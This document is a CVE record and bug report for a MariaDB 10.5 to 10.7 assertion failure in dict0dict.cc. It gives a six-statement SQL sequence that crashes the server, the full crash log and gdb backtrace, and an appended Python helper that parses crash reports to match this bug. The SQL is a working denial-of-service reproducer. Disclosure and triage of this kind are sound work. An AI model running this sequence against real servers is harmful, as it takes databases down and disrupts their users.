CVE-2022-32082: [MDEV-26433] assertion: table->get_ref_count() == 0 in dict0dict.cc line 1915

MariaDB v10.5 to v10.7 was discovered to contain an assertion failure at table->get_ref_count() == 0 in dict0dict.cc.


Steps to reproduce (run in order against an affected server):

CREATE TEMPORARY TABLE v0 ( v1 TEXT ( 15 ) CHAR SET BINARY NOT NULL NOT NULL UNIQUE CHECK ( v1 ) ) REPLACE SELECT NULL AS v3 , 74 AS v2 ;

SELECT SQL_CALC_FOUND_ROWS * FROM v0 WHERE v1 IN ( SELECT v3 FROM v0 ) LIMIT 16 ;

DROP PROCEDURE v0 ;

CREATE TABLE v4 ( v6 INT , v5 INT DEFAULT 27 ) ;

ROLLBACK TO SAVEPOINT v4 ;

INSERT INTO v4 VALUES ( + 84 , + 32 , 48 ) ;

Crash report (server compiled with ASAN):

Server version: 10.7.0-MariaDB

key_buffer_size=134217728

read_buffer_size=131072

max_used_connections=1

max_threads=153

thread_count=1

It is possible that mysqld could use up to

key_buffer_size + (read_buffer_size + sort_buffer_size)*max_threads = 467956 K bytes of memory

Hope that’s ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong...

stack_bottom = 0x7fb65ba7c850 thread_stack 0x5fc00

sanitizer_common/sanitizer_common_interceptors.inc:4203(__interceptor_backtrace.part.0)[0x7fb67b328c3e]

mysys/stacktrace.c:213(my_print_stacktrace)[0x55df46af9747]

sql/signal_handler.cc:222(handle_fatal_signal)[0x55df45ac1120]

sigaction.c:0(__restore_rt)[0x7fb67ad12870]

:0(__GI_raise)[0x7fb67a7f1d22]

:0(__GI_abort)[0x7fb67a7db862]

include/ut0ut.h:319(ib::logger& ib::logger::operator<< <int>(int const&))[0x55df44f00246]

dict/dict0dict.cc:1258(dict_sys_t::evict_table_LRU(bool) [clone .cold])[0x55df44f2296e]

include/dict0dict.h:1578(dict_sys_t::unlock())[0x55df463d955f]

sql/handler.cc:577(hton_drop_table(handlerton*, char const*))[0x55df45ad0145]

sql/temporary_tables.cc:703(THD::rm_temporary_table(handlerton*, char const*))[0x55df4594c2c8]

sql/temporary_tables.cc:1464(THD::free_tmp_table_share(TMP_TABLE_SHARE*, bool))[0x55df4594d237]

sql/temporary_tables.cc:672(THD::drop_temporary_table(TABLE*, bool*, bool))[0x55df459513f5]

sql/sql_insert.cc:5203(select_create::abort_result_set())[0x55df452837f5]

sql/sql_select.cc:563(handle_select(THD*, LEX*, select_result*, unsigned long))[0x55df454f48a5]

sql/sql_table.cc:11732(Sql_cmd_create_table_like::execute(THD*))[0x55df455d8e27]

sql/sql_parse.cc:5997(mysql_execute_command(THD*, bool))[0x55df45359180]

sql/sql_parse.cc:8047(mysql_parse(THD*, char*, unsigned int, Parser_state*))[0x55df453665a1]

sql/sql_parse.cc:1898(dispatch_command(enum_server_command, THD*, char*, unsigned int, bool))[0x55df4536c60c]

sql/sql_parse.cc:1406(do_command(THD*, bool))[0x55df4537173d]

sql/sql_connect.cc:1418(do_handle_one_connection(CONNECT*, bool))[0x55df4572ce57]

sql/sql_connect.cc:1312(handle_one_connection)[0x55df4572d33d]

perfschema/pfs.cc:2204(pfs_spawn_thread)[0x55df461bdc2c]

pthread_create.c:0(start_thread)[0x7fb67ad08259]

:0(__GI___clone)[0x7fb67a8b35e3]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x6290000873d0): CREATE TEMPORARY TABLE v0 ( v1 TEXT ( 15 ) CHAR SET BINARY NOT NULL NOT NULL UNIQUE CHECK ( v1 ) ) REPLACE SELECT NULL AS v3 , 74 AS v2

Connection ID (thread ID): 4

Status: NOT_KILLED

Optimizer switch: index_merge=on,index_merge_union=on,index_merge_sort_union=on,index_merge_intersection=on,index_merge_sort_intersection=off,engine_condition_pushdown=off,index_condition_pushdown=on,derived_merge=on,derived_with_keys=on,firstmatch=on,loosescan=on,materialization=on,in_to_exists=on,semijoin=on,partial_match_rowid_merge=on,partial_match_table_scan=on,subquery_cache=on,mrr=off,mrr_cost_based=off,mrr_sort_keys=off,outer_join_with_cache=on,semijoin_with_cache=on,join_cache_incremental=on,join_cache_hashed=on,join_cache_bka=on,optimize_join_buffer_size=on,table_elimination=on,extended_keys=on,exists_to_in=on,orderby_uses_equalities=on,condition_pushdown_for_derived=on,split_materialized=on,condition_pushdown_for_subquery=on,rowid_filter=on,condition_pushdown_from_having=on,not_null_range_scan=off

The manual page at https://mariadb.com/kb/en/how-to-produce-a-full-stack-trace-for-mysqld/ contains

information that should help you find out what is causing the crash.

Writing a core file...

Working directory at /home/fuboat/mariadb-tmp/18

Resource Limits:

Limit Soft Limit Hard Limit Units

Max cpu time unlimited unlimited seconds

Max file size unlimited unlimited bytes

Max data size unlimited unlimited bytes

Max stack size 8388608 unlimited bytes

Max core file size unlimited unlimited bytes

Max resident set unlimited unlimited bytes

Max processes 61608 61608 processes

Max open files 524288 524288 files

Max locked memory 65536 65536 bytes

Max address space unlimited unlimited bytes

Max file locks unlimited unlimited locks

Max pending signals 61608 61608 signals

Max msgqueue size 819200 819200 bytes

Max nice priority 0 0

Max realtime priority 0 0

Max realtime timeout unlimited unlimited us

Core pattern: core

gdb bt:

Using host libthread_db library "/usr/lib/libthread_db.so.1".

Core was generated by `/usr/local/mysql/bin//mysqld --port 10018 --datadir=/home/fuboat/mariadb-tmp/18'.

Program terminated with signal SIGABRT, Aborted.

#0 0x00007fb67ad0f808 in pthread_kill () from /usr/lib/libpthread.so.0

#1 0x000055df45ac106b in handle_fatal_signal (sig=<optimized out>) at /experiment/mariadb-server/sql/signal_handler.cc:344

#2 <signal handler called>

#3 0x00007fb67a7f1d22 in raise () from /usr/lib/libc.so.6

#4 0x00007fb67a7db862 in abort () from /usr/lib/libc.so.6

#5 0x000055df44f00246 in ut_dbg_assertion_failed (expr=expr@entry=0x55df4700bd40 "table->get_ref_count() == 0", file=file@entry=0x55df4700ae60 "/experiment/mariadb-server/storage/innobase/dict/dict0dict.cc", line=line@entry=1890) at /experiment/mariadb-server/storage/innobase/ut/ut0dbg.cc:60

#6 0x000055df44f2296e in dict_sys_t::remove (this=<optimized out>, this@entry=0x55df478238c0 <dict_sys>, table=0x61700003ff08, lru=<optimized out>, lru@entry=false, keep=<optimized out>, keep@entry=true) at /experiment/mariadb-server/storage/innobase/dict/dict0dict.cc:1890

#7 0x000055df463d955f in ha_innobase::delete_table (this=<optimized out>, name=<optimized out>) at /experiment/mariadb-server/storage/innobase/handler/ha_innodb.cc:13360

#8 0x000055df45ad0145 in hton_drop_table (hton=<optimized out>, path=<optimized out>) at /experiment/mariadb-server/sql/handler.cc:576

#9 0x000055df4594c2c8 in THD::rm_temporary_table (this=<optimized out>, base=<optimized out>, path=0x61a000061d48 "/tmp/#sql-temptable-3021ca-4-0") at /experiment/mariadb-server/sql/temporary_tables.cc:703

#10 0x000055df4594d237 in THD::free_tmp_table_share (this=<optimized out>, share=0x61a000061898, delete_table=<optimized out>) at /experiment/mariadb-server/sql/temporary_tables.cc:1462

#11 0x000055df459513f5 in THD::drop_temporary_table (this=0x62b0000bd218, table=<optimized out>, is_trans=is_trans@entry=0x0, delete_table=delete_table@entry=true) at /experiment/mariadb-server/sql/temporary_tables.cc:669

#12 0x000055df451da338 in drop_open_table (thd=<optimized out>, table=<optimized out>, db_name=<optimized out>, table_name=<optimized out>) at /experiment/mariadb-server/sql/sql_base.cc:1355

#13 0x000055df452837f5 in select_create::abort_result_set (this=0x6290000890c8) at /experiment/mariadb-server/sql/sql_insert.cc:5202

#14 0x000055df454f48a5 in handle_select (thd=thd@entry=0x62b0000bd218, lex=lex@entry=0x62b0000c12f8, result=result@entry=0x6290000890c8, setup_tables_done_option=setup_tables_done_option@entry=0) at /experiment/mariadb-server/sql/sql_select.cc:563

#15 0x000055df455d8e27 in Sql_cmd_create_table_like::execute (this=<optimized out>, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/sql_table.cc:11732

#16 0x000055df45359180 in mysql_execute_command (thd=0x62b0000bd218, is_called_from_prepared_stmt=<optimized out>) at /experiment/mariadb-server/sql/sql_parse.cc:5997

#17 0x000055df453665a1 in mysql_parse (thd=0x62b0000bd218, rawbuf=<optimized out>, length=<optimized out>, parser_state=<optimized out>) at /experiment/mariadb-server/sql/sql_parse.cc:8030

#18 0x000055df4536c60c in dispatch_command (command=<optimized out>, thd=0x62b0000bd218, packet=<optimized out>, packet_length=<optimized out>, blocking=<optimized out>) at /experiment/mariadb-server/sql/sql_parse.cc:1896

#19 0x000055df4537173d in do_command (thd=0x62b0000bd218, blocking=blocking@entry=true) at /experiment/mariadb-server/sql/sql_parse.cc:1404

#20 0x000055df4572ce57 in do_handle_one_connection (connect=<optimized out>, put_in_cache=<optimized out>) at /experiment/mariadb-server/sql/sql_connect.cc:1418

#21 0x000055df4572d33d in handle_one_connection (arg=arg@entry=0x6080000023b8) at /experiment/mariadb-server/sql/sql_connect.cc:1312

#22 0x000055df461bdc2c in pfs_spawn_thread (arg=0x617000005b98) at /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

#23 0x00007fb67ad08259 in start_thread () from /usr/lib/libpthread.so.0

#24 0x00007fb67a8b35e3 in clone () from /usr/lib/libc.so.6
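As an added triage helper (not part of this CVE record or of MariaDB's own code), a small Python parser for the mysqld crash-report format shown above: it extracts the server version, the statement that was executing and the mysys-style stack frames, then checks the fingerprint this report gives (an InnoDB dict0dict.cc frame reached from the temporary-table drop path on a 10.5 to 10.7 server). The sample report is a constructed excerpt of the one above; the function and variable names are my own.

```python
import re

# Constructed excerpt of a mysqld crash report, modelled on the report in this
# CVE record (the version, query and frame lines are copied from the page).
SAMPLE_REPORT = """\
Server version: 10.7.0-MariaDB
:0(__GI_abort)[0x7fb67a7db862]
include/ut0ut.h:319(ib::logger& ib::logger::operator<< <int>(int const&))[0x55df44f00246]
dict/dict0dict.cc:1258(dict_sys_t::evict_table_LRU(bool) [clone .cold])[0x55df44f2296e]
sql/handler.cc:577(hton_drop_table(handlerton*, char const*))[0x55df45ad0145]
sql/temporary_tables.cc:703(THD::rm_temporary_table(handlerton*, char const*))[0x55df4594c2c8]
sql/sql_insert.cc:5203(select_create::abort_result_set())[0x55df452837f5]
Query (0x6290000873d0): CREATE TEMPORARY TABLE v0 ( v1 TEXT ( 15 ) CHAR SET BINARY NOT NULL NOT NULL UNIQUE CHECK ( v1 ) ) REPLACE SELECT NULL AS v3 , 74 AS v2
Connection ID (thread ID): 4
Status: NOT_KILLED
"""

# One frame of the mysys-style trace: file:line(function)[address].
FRAME_RE = re.compile(r"^(?P<file>[^\s:(]*):(?P<line>\d+)\((?P<func>.*)\)\[(?P<addr>0x[0-9a-f]+)\]$")
SCALARS = {"Server version: ": "server_version",
           "Connection ID (thread ID): ": "connection_id", "Status: ": "status"}

def parse_crash_report(text):
    """Return the scalar fields, the failing query and the frame list."""
    info = {"frames": []}
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        m = FRAME_RE.match(line)
        if m:
            info["frames"].append((m["file"], int(m["line"]), m["func"]))
            continue
        for prefix, key in SCALARS.items():
            if line.startswith(prefix):
                info[key] = line[len(prefix):]
        if line.startswith("Query (") and "): " in line:
            info["query"] = line.split("): ", 1)[1]
    return info

def affected_series(version):
    # The CVE text lists MariaDB 10.5 through 10.7 by series only, so a fixed
    # point release inside one of those series is still reported here as affected.
    m = re.match(r"(\d+)\.(\d+)\.", version)
    return bool(m) and int(m[1]) == 10 and 5 <= int(m[2]) <= 7

def matches_cve_2022_32082(info):
    # Fingerprint from this report: an InnoDB dict0dict.cc frame while dropping
    # a temporary table (THD::rm_temporary_table) on an affected server version.
    in_dict = any(f.endswith("dict0dict.cc") for f, _, _ in info["frames"])
    via_tmp_drop = any(fn.startswith("THD::rm_temporary_table") for _, _, fn in info["frames"])
    return in_dict and via_tmp_drop and affected_series(info.get("server_version", ""))
```

Point parse_crash_report at the error log of a crashed server; a match means the crash should be triaged against this CVE rather than as an unrelated InnoDB assertion.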
